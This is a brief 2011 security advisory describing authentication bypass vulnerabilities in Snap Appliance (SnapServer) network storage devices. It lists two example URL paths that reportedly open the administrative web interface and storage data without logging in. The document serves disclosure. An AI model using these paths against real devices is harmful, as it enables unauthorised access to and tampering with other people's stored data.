Multiple Snap Appliance (SnapServer) Bypass Vulnerabilities

2011-02-14T00:00:00
ID SECURITYVULNS:DOC:25696
Type securityvulns
Reporter Securityvulns
Modified 2011-02-14T00:00:00

Description

Exploit Title: Multiple Snap Appliance (SnapServer) Vulnerabilities

Date: 13-02-2011

Author: SeeMe

Vendor Link: http://www.overlandstorage.com/

Effected Version(s): N/A

Multiple SnapAppliance (SnapServer) suffers from Multi-vulnerabilities which allows unprivileged users to view and modify Storage-Data, this vulnerability can be exploited via web browser.

The following example URL(s) will allow access to the Storage's main administrative Web page without authentication:

http://127.0.0.1/patch/DataKeeper Backup Of C/Documents and Settings/LocalService/Local Settings/
http://127.0.0.1/common-cgi/shownas